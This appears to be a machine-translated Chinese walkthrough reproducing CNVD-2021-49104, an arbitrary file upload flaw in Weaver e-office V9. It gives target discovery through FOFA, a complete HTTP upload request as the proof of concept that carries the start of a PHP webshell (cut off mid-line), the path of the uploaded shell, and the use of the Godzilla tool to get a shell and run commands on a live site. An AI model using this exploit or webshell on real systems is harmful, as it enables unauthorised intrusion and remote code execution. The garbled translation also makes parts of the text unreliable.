Upload an e-office V9 arbitrary file [vulnerability recurrence practice]

One 、 Preface

Due to the spread of 、 Any direct or indirect consequences and losses caused by using the information provided in this article , All by the user's own responsibility , The author of this article is not responsible for this .

The vulnerabilities in this article are all public vulnerability collection , If the vulnerability in the article appears, sensitive content has a partial impact , Please contact the author in time , Hope to understand .

Two 、 Loophole principle

This recurrence vulnerability is an undisclosed vulnerability CNVD-2021-49104, The vulnerability is due to e-office The user input part in the upload module was not properly handled , Attackers can construct malicious uploaded packets , Implement arbitrary code execution .

The following figure shows the code snippet related to the vulnerability

chart 1 Vulnerability code snippet

The location of the source code where the vulnerability exists , Mainly from uploadType The parameter is set to eoffice_logo when , There is no verification for the file , Cause arbitrary file upload .

DMS from “ Information ” Get relevant technical data

3、 ... and 、 Loophole recurrence actual combat

1. information gathering

FOFA Collection involves E-office Of Web Site

chart 2 FOFA information gathering

2. Select the recurrence target

With XX For example, website

chart 3 OA E-office Interface

3. structure POC

Burpsuite Carry out the bag , Repackage . The packet is constructed as

POC：

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4

--e64bdf16c554bbc109cecef6451c26a4  Content-Disposition: form-data; name="Filedata"; filename="test.php"  Content-Type: image/jpeg  <?php  @session_start();  @set_time_limit(0);  @error_reporting(0);  function encode($D,$K){  for($i=0;$i

chart 4 Burpsuite Repackage

combination burp Response , Echo as file name , File uploaded successfully logo-eoffice.php.

4. Verify the vulnerability and getshell

After uploading , Access the following path http://？？？/images/logo/logo-eoffice.php

chart 5 Access file path

Use the tool Godzilla , Connect shell

chart 6 Godzilla getshell

To carry out an order , It can be executed normally , success getshell

chart 7 Command execution

【 Related technical documents 】

Four 、 summary

This article briefly introduces the vulnerability principle of the vulnerability and completes the practice of vulnerability recurrence .